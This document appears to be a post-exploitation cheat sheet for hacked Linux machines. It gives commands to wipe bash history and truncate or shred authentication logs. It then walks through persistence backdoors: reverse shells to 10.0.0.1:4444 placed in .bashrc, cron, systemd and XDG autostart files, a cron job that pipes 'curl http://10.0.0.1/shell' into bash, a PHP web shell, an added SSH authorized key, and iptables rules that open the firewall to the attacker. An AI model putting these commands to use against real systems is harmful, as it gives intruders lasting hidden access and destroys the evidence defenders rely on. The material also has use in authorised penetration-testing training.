Post Exploitation

Cover Your Tracks & Remain Undetected

Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain UndetectedNull Byte

Clear History

unset HISTORY
echo '' > ~/.bash_history
echo '' > /root/.bash_history
history -c
export HISTSIZE=0
unset HISTFILE

Clear Logs

# Shrink the size of log files with `truncate -s 0`
truncate -s 0 /var/log/auth.log
echo '' > /var/log/auth.log
cat /dev/null > /var/log/auth.log
> /var/log/auth.log
dd if=/dev/null of=/var/log/auth.log
shred /var/log/auth.log

Persistence

.bashrc

Add this line to /root/.bashrc or /home/<user>/.bashrc to gain access to target machine by reverse shell when the victim user logged in.

bash -i >& /dev/tcp/10.0.0.1/4444

Cron

Add the following line to the cron file like /etc/crontab in the target machine. Replace 10.0.0.1 with your ip address.

* * * * * root curl http://10.0.0.1/shell | bash

Host a shell and start you listener

#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Now start local web server and listener in each terminal in local machine.

sudo python3 -m http.server 80
nc -lvnp 4444

PHP

1. Create a Payload

Create a php file (e.g. shell.php) into /var/www/html.

<?php 

	if (isset($_REQUEST['cmd'])) {
		echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
	}

?>

Navigate to the file

http://<target-ip>/shell.php?cmd=bach -i >& /dev/tcp/<local-ip>/4444 0>&1

SSH

We can establish a backdoor to allow us to be able to connect the target SSH server anytime by leaving our public key in the target machine.

1. Generate a New SSH key

First off, run the following command to generate SSH key.

ssh-keygen

It will generate two keys, private key (id_rsa) and public key (id_rsa.pub).

2. On the target host add you public IP

echo "<content-id_rsa.pub>"  >> authorized_keys

Systemd

We can use systemd as a backdoor because an arbitrary command will be executed when a service start. The command is stored in [Services] section in the configuration file.

1. Create a New Systemd Config File

Create /etc/systemd/system/backdoor.service in target machine. This service will execute reverse shell when starting.

[UNIT]
Description=Backdoor

[Service]
Type=simple
ExecStart=/bin/bash -i >& /dev/tcp/<local-ip>/4444 0>&1

[Install]
WantedBy=multi-user.target

Then enable the service.

systemctl enable backdoor

Now this service will start when the target system boots.

2. Wait for Reverse Connecting

We need to leave the netcat listener running in local machine.

nc -lvnp 4444

Then we'll get a shell anytime the service starts.

XDG Autostart

Reference: TryHackMe

Autostart is also used for persistence. First create a $HOME/.config/autostart directory if it does not exist and create a new file with arbitrary name as below:

mkdir -p /home/<user>/.config/autostart
touch /home/<user>/.config/autostart/evil.desktop

Then write a malicious code in this file:

# /home/<users>/.config/autostart/evil.desktop

[Desktop Entry]
Type=Application
Name=Test
Exec=/bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

After that, the command at the Exec field will be executed when the target user logs in. We need to keep opening a listener in attack machine for receiving incoming connection:

nc -lvnp 4444

Option: Firewall Bypass

If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege.

# List the iptables settings
iptables --list

# ACCEPT: TARGET => ATTACKER
# OUTPUT 1: The first rule of the OUTPUT chain.
# -d: Destination address
iptables -I OUTPUT 1 -p tcp -d <attacker-ip> -j ACCEPT

# ACCEPT: TARGET <= ATTACKER
# INPUT 1: The first rule of the INPUT chain.
# -s: Source address
iptables -I INPUT 1 -p tcp -s <attacker-ip> -j ACCEPT